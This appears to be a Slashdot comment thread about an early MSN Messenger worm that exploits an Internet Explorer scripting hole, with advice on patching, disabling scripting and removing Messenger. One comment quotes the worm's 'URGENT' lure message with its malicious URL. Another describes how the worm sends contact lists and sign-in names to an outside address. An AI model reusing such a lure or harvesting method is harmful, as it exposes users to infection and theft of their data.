I don't get it... why do people whine about this? Just disable Javascript. Everything worthwhile on the web will still work just fine; it'll just go faster and screw you less often. Javascript should be extinct by now: Everyone who uses it hates it, people who turn it off are happier (I have never seen those x10 pop-under ads that everyone talks about), and it doesn't do anything useful. It's all pain with no gain.
Web browsers shouldn't even include it anymore.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
it isn't integrated into anything, even if it comes with the OS
Bzzt yourself. Messenger is integrated with at least Outlook, and I suspect IE 6. (IE can make API calls to Messenger, regardless.) And you have apparently never used XP, where it seemingly pervades the entire system. *shudders*
- fader
The version I got reads
URGENT - Go to http://users.skynet.be/dark.angel/cool.htm
I went, but Mozilla crashed on accessing the site so I wasn't affected. Then I got a clone message, and the evil purpose rapdily became clear. Anyone peaked at this to see if the code is essentially the same?
--
From Phil
Don't say:
"I suggest you do not follow the link"
Say:
Don't click on the link unless you want your computer to be fucked.
Got Freedom?
Thinking?
> I hate my COBOL! course
Is that the Yahoo! version of COBOL?
I won't do the stupid *bzzt* think..but I think you are misinformed. I have both Outlook 6 (freaking slow piece of carp) and IE 6, and I have NO MSN messanger or Microsoft Messanger or anything. I've never really used it. *shrug* I'm running Windows 98...so that might have to do with why it isn't integrated.
The anti-salmon
Any application can "make API calls to" (I think the better term is "automate") Messenger. I have written VB apps to do it. It is similar to the way you can fire up an instance of Word or Excel from a VB app and create a document programmatically. Nothing really to do with whether it is integrated into the OS or any other application.
erm..."thing" not "think" stupid typo.
The anti-salmon
-
Device failures:
Note that most of the reported problems are timing related. Medical gear should be using a true real time OS, like QNX, with maximum latency guarantees.Six eyes experienced interruptions during the surgical procedure due to laser system failures: a faulty on/off switch (1); internal timing error (3), double pressing of footswitch by operator (1); and failure to track due to simultaneous activation of tracking and printing (1).
little did the visitors of Slashdot.org know, they were unwitting participants in the world's first human-powered smurf attack experiment.
Just raise the taxes on crack.
*shrugs* All I know is that I'm forced to use Outlook at work, on a 2000 box. Outlook shows whether or not the sender for any emails you're viewing are online or offline if they're in your MSN contact list.
- fader
What does a server side Perl thing have to do with an MSN bug? Is this thing attacking vulnerable web servers to propagate it's malicious Jscript?
Intresting.
autopr0n is like, down and stuff.
Well it's only a matter of time until this type of things becomes another way to advertize the fact that "My University Degree is Ready for $19.99"
bjb
The surest way to make a monkey of a man is to quote him. --Robert Benchley
Just one (well, two) minor caveats, if you don't mind. :) :)
To start with, Trillian doesn't support the Jabber protocol. That is annoying (Jabber rocks, dontcha know).
Second problem, Trillian knows nothing of \n carriage returns. It means that, if a friend using, say, licq or some Jabber implementation on Linux/*BSD/whatever sends you a message, the carriage returns won't be displayed properly. That's pretty annoying -- such messages will generally become very hard to read. I notified the dev team about this bug, but they never deemed necessary to answer my email. Oh well, I guess I'll stick with Jabber.
-- B.
This sig does in fact not have the property it claims not to have.
Now, I try [Windows Update] again, and I'm getting the same old Can't Find Server message. Anyone else having problems with the site, or is it just me?
Between the SNMP scare and this vulnerability, Windows Update is probably just slashdotted.
Will I retire or break 10K?
Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?
Slashdot already exports an RSS feed of its stories. Just point an RSS ticker applet or script at the RSS feed and watch the stories scroll by.
Will I retire or break 10K?
... this happens right smack dab in the middle of Microsoft's self-proclaimed Focus on Security Month.
Slashdot most certainly does have a bias. Editorial comments appear on the front page. When was the last time you saw Slashdot advocate something like windows XP? When was the last time you saw Slashdot advocate something linux based?
Exactly.
What a sucky virus! They shoulda had it popping up porn sites in separate windows...just what the unsuspecting doofus needs when the boss walks in...
You're using her as bait, Master!
I thought the title meant a warhol worm at first.
World-wide worm propagation in 15 minutes. Finally something worth the attention given to not-so-well designed worms such as code red.
edit the \WINDOWS\inf\sysoc.inf
look for
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
delete the hide part then you can uninstall ms messenger by using the add/remove windows components.
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 is what it should look like in the end
I just stumbled across this idea, but since there are numerous posts about this, i was thinking... Wow, what a nerd.. then I was thinking... Hey, this is like a HUGE example of 6 degrees of separation, and I am linked to anyone else who got the MSN message, and not only am I linked to you, but we were both online at the same time... who's the nerd now?
Hmm.
Is that net or (dot)NET?
Bold prediction : same (dot)NET slashdot story , 2 years from now.
You are in a twisty maze of processor lines, all alike.
There is a lot of hype here.
It was controversial. It was not unsupported; he provided as much support for his position as you have. It's just a matter of opinion as to whether the valid applications of javascript make the annoying applications worth it.
Personally, I have no problem with javascript as long as it acts only within the page that it was loaded on. When it tries to take over duties that belong to my window manager, though, I get unhappy. 95% of javascript's problems would go away if it couldn't open new windows and/or resize them. Besides, people should be middle-clicking to do "open link in new window" anyway :)
Your right to not believe: Americans United for Separation of Church and
Have you ever seen the instruction set architecture of the Intel processor family? It's kludges and spaghetti all the way from the candy coated XP shell down to the chewy x86 center. To experienced geeks like me it feels like a sticky film coating every PC. For elegance and thoughtful design you have to go to processors that were born in the 80s and 90s -- and the non-Microsoft OSs that run on them.
-- thinkyhead software and media
I got this URL from a friend, so of course, I opened it in Opera, and when nothing happened, I thought...
"Just like every other site that was written with only IE in mind, I had better open this in IE so I can see what it really is."
*sigh*
...a 'popular' Microsoft product that hasn't had virus capability? Word, Excel, Outlook, Outlook Express, countless Windows 3.1 thru 2000, hell, XP is a honey pot OS just by connecting it to a network. My point being, why is this news? Anything you run with M$ in the About box will at some point destroy one or more aspects of your computer, be it the hard drive, cpu, network connection, etc. Today it's the IM. Tomorrow it'll be the icon editor...
Any connection between your reality and mine is purely coincidental.
Saw the TV show too. Cool.
Unlimited growth == Cancer.
I went through Australia's only nuclear reactor, which is at Lucas Heights near Sydney, and inside the reactor (as in 3m from the fissioning uranium), what do I see, but many-a-start-button lurking around.
Actually, it's not as interesting as that. They dont control stuff, they just log data from experiments being performed. That and there was a button rigged up labelled "Dont press me", with a counter behind it to found out how many times it got pressed :-)
dominionrd.blogspot.com - Restaurants on
This virus does not use ECMAScript so it will not work if you didn't have Internet Explorer installed on your machine. Mozilla, Netscape as well as Konquerer and Opera shouldn't be affected by this. The code looks too darn easy. I can't believe people can have access so easily to your machine!
We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.
We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.
This new worm, although harmless, is a direct rip of the example code from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.
As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.
The next MSN worm might be far worse.
Please, please all Internet Explorer users patch your systems now. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.
I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?
I saw a peice from uThe inquirer about a little hack which winxp/2k users can use to enable them toZapp the unwanted bits of XP.... like Microsoft Instant Messaging. Useful stuff.
return 0; }
Well, I tried the Register demostration page, and I only got this:
"Sorry, there was an error in the script.
This may well be due to your IE security settings - try resetting them to default and trying again.
..."
IE6 is much better when it comes to security and privacy than IE5.
Aah, the wonders of Microsoft... It still amases me to know how many really good programmers they have working for them, yet they can still leave massive gaps in system security, I mean, come on - some of them MUST have some common sense... ... right?
Anyhow - on with the reply
BTW - I'm new here, so excuse me if I say something thats all ready been said..
A few mates and me, at college, have been working on a few idea's about system security (for a project we've been given by the college), and one of the things that we came up with was an Anti Virus, Virus.
Based on the idea of a GTV (Genetically Targeting Virus), its a small program, that circulates itself like a virus or worm, but instead of causing damage to a system, it prevents one type of virus from affecting that system.
Thoughts and comments are welcome
What pisses me off about this is that Microsoft is the one who makes all the money from this, yet I am the one who has to clean up my friends computers every third Tuesday for them, because MSN allows any program (or indeed website, it's used on the msn portal pages) to access it's internal objects via COM. Not that there is anything wrong with this idea, but due to their lax coding, it's people like me who get to pick up the pieces.
As I access MSN via Jabber I can't be infected with these viruses anyway, but the fact that MSN isn't even a particularly great chat program especially rankles.
That's interesting, look further down the page, and there's Possibility of a Warhol Worm: Complete infection in 15 minutes! from August 2001.
M$ is suppose to have a Security Notification Service
t .asp?url=/technet/security/bulletin/ms02-nnn.asp, where nnn is the next Bulletin in sequence), but oddly enough, I discovered MS02-005 on the McAfee homepage.
which informs you by E-mail when a new Security Bulletin is available. Ever since the December Uber-Patch, the system has been malfunctioning, and useless.
The easiest way I found was anticipating the URL (http://www.microsoft.com/technet/treeview/defaul
Mod Karma -1: I sed bad wurds. If I cep my mouf shut, I wud be at riyses.
How often do you see a url on a slashdot story halfway down the page (or even with >5 comments) that doesnt result in a 404 error???
If sites that are around to provide exploits in IE+MSN Messenger have a good enough server to keep themselves up underneath the traffic the messages are sending them from stupid people, and even a half hearted slashdot effect, then they are obviously pretty dedicated to being mildly annoying.
c - a blessed +5 grain of salt
I don't get all of you pro-Internet Explorer folks. Is it not blatantly obvious that this shit is put into the browser intentionally? You don't see Opera or Mozilla getting patched for these types for things...
And yet... People stil use IExploder cause it is convenient.
I, too, despise COBOL. It is the work of the devil, I say!
http://wsulug.org
Time to get a new admin. 90% of all user infections are caused by Outhouse. Install another email client.
09 F9 11 02 9D 74 E3 5B - D8 41 56 C5 63 56 88 C0 45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
Is anyone else finding a coincidence here that this follows a story entitled "what is .NET?"? I think we now know :-)
There is no reasonable defense against an idiot with an agenda
:wq
The program itself is telling you how to try to bypass security.
Unless one is a knowledgable person when it comes to computer issues, this should not be an option.
IANAL but write like a drunk one.
Yep, I did this, too. However, I noticed that when I run CNET's CatchUp scan, it picks up a MSN Messenger DLL still on my hard drive. I'm kind of afraid to delete it. I wonder if anything else is using it or if there still exists some kind of security risk with it being there?
My host suspended my account for a day or two after this happened to me. They came down on me for "excessive" email sending. After a little digging, i found out that the emails were coming from my copy of formmail.pl.
I checked Matt's site, but didn't see any notices about this. Glad to see it was the script, not something I had done. (well, other than installing the script in the first place, i guess)
If i had the points, i'd mod you uP.
-c
I have discovered a truly remarkable proof which this margin is too small to contain.
To uninstall something properly, all you should have to use is a single RPM (or whatever you use) command. Typically that's all it takes. But with this crazy windows program you have to use an application that MS warns you never to use except in dire circumstances and use some poorly documented trick. Sheesh...
Check out "flash crowds", "flash riots", transport booths, etc. They are a "real world" version of "slashdotting". Or, I guess you could say that since these stories were written before /. that slashdotting is a virtual version of a flash crowd. It is the first that I ever heard of, that is where large numbers of people decide to "go somewhere" in a short period of time because of something that they had seen somewhere else.
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
Unlike Dos, W95 isn't a single-tasking OS. There's crap running in the background that makes it LESS stable than Dos. And there's a big difference between a POS Dos system (used for sales) and a POS (piece of $h!t) W95 medical system. Finally, perhaps the reason the tech was trained to ignore error messages is because Windows throws them all the time.
Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
Not everything on the homepage is broken. Most pages in 'afbeeldingen' (images) are actually working.
Somehow, none of it strikes me as something built by someone who wrote that script, though. Not even if that someone only copied the script from somewhere else...
I'm thinking there's a good chance this exploit was only a way to take revenge for something on mmargae by someone else; can you imagine what this is doing to his account? - I don't know that much about the isp used here, but there's no way the user's account is equipped to handle such amount of email he must have been getting...
Then again, if this is only about revenge, why send the msn-logon of the infected person along?
Indeed, on any platform Mozilla runs on, it lets you disable these "features" of javascript and still run javascript and java. Konquerer lets you turn off popups, but I haven't seen it available for anything but Linux.
Mozilla lets you disable popup windows, status bar changes, resizing, and raising/lowering windows.